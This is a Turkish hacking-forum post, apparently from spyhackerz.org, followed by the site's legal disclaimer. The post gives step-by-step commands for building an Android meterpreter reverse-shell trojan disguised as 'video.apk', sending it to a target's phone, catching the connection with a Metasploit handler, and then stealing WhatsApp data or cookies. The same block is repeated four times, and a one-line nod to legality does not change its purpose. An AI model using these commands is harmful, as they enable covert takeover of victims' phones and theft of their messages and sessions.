Eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz.. Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.
{msfvenom -p android/meterpreter/reverse_tcp lhost=ip adresiniz lport=portgirin R > /sdcard/video.apk}
enter tuşuna basıp trojanımızı hazırlıyoruz, burada sdcard telefondaki konumu video.apk ise trojan verdiğimiz isim TROJANI hedef telefona yollayıp açmasını sağlıyorsunuz (AMA BU CİDDİ BİR SUÇTUR VE CEZASI VARDIR) onun için kendi telefonunuzda deneyin, daha sonra
msfconsole
kodu ile metasploite girip
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost=ip adresiniz
set lport=port no
run
Enter diyip dinlemeye alıyoruz kolay gelsin
gerisini wp çalarak halledin veya cookies çekin (heryerde cookies çalışmaz !)
{msfvenom -p android/meterpreter/reverse_tcp lhost=ip adresiniz lport=portgirin R > /sdcard/video.apk}
enter tuşuna basıp trojanımızı hazırlıyoruz, burada sdcard telefondaki konumu video.apk ise trojan verdiğimiz isim TROJANI hedef telefona yollayıp açmasını sağlıyorsunuz (AMA BU CİDDİ BİR SUÇTUR VE CEZASI VARDIR) onun için kendi telefonunuzda deneyin, daha sonra
msfconsole
kodu ile metasploite girip
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost=ip adresiniz
set lport=port no
run
Enter diyip dinlemeye alıyoruz kolay gelsin
gerisini wp çalarak halledin veya cookies çekin (heryerde cookies çalışmaz !)
{msfvenom -p android/meterpreter/reverse_tcp lhost=ip adresiniz lport=portgirin R > /sdcard/video.apk}
enter tuşuna basıp trojanımızı hazırlıyoruz, burada sdcard telefondaki konumu video.apk ise trojan verdiğimiz isim TROJANI hedef telefona yollayıp açmasını sağlıyorsunuz (AMA BU CİDDİ BİR SUÇTUR VE CEZASI VARDIR) onun için kendi telefonunuzda deneyin, daha sonra
msfconsole
kodu ile metasploite girip
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost=ip adresiniz
set lport=port no
run
Enter diyip dinlemeye alıyoruz kolay gelsin
gerisini wp çalarak halledin veya cookies çekin (heryerde cookies çalışmaz !)
{msfvenom -p android/meterpreter/reverse_tcp lhost=ip adresiniz lport=portgirin R > /sdcard/video.apk}
enter tuşuna basıp trojanımızı hazırlıyoruz, burada sdcard telefondaki konumu video.apk ise trojan verdiğimiz isim TROJANI hedef telefona yollayıp açmasını sağlıyorsunuz (AMA BU CİDDİ BİR SUÇTUR VE CEZASI VARDIR) onun için kendi telefonunuzda deneyin, daha sonra
msfconsole
kodu ile metasploite girip
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost=ip adresiniz
set lport=port no
run
Enter diyip dinlemeye alıyoruz kolay gelsin
gerisini wp çalarak halledin veya cookies çekin (heryerde cookies çalışmaz !)
Legal Notice:
The website spyhackerz.org is classified as a “Hosting Provider” (“Yer Sağlayıcı”) within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. All content is created entirely by users without any prior approval, similar to platforms such as X, Instagram, Facebook, etc.
As a hosting provider, spyhackerz.org is not obliged to monitor, control, or investigate user-generated content or any potentially unlawful sharing. There are no “attack teams” on spyhackerz.org, and no harmful activities are carried out against websites located in Türkiye.
SPYHACKERZ is not responsible for any individual hacking-related forum activities carried out by its members. If any hacking activity is conducted against your websites using the name spyhackerz.org, all responsibility lies solely with the member who performs the attack.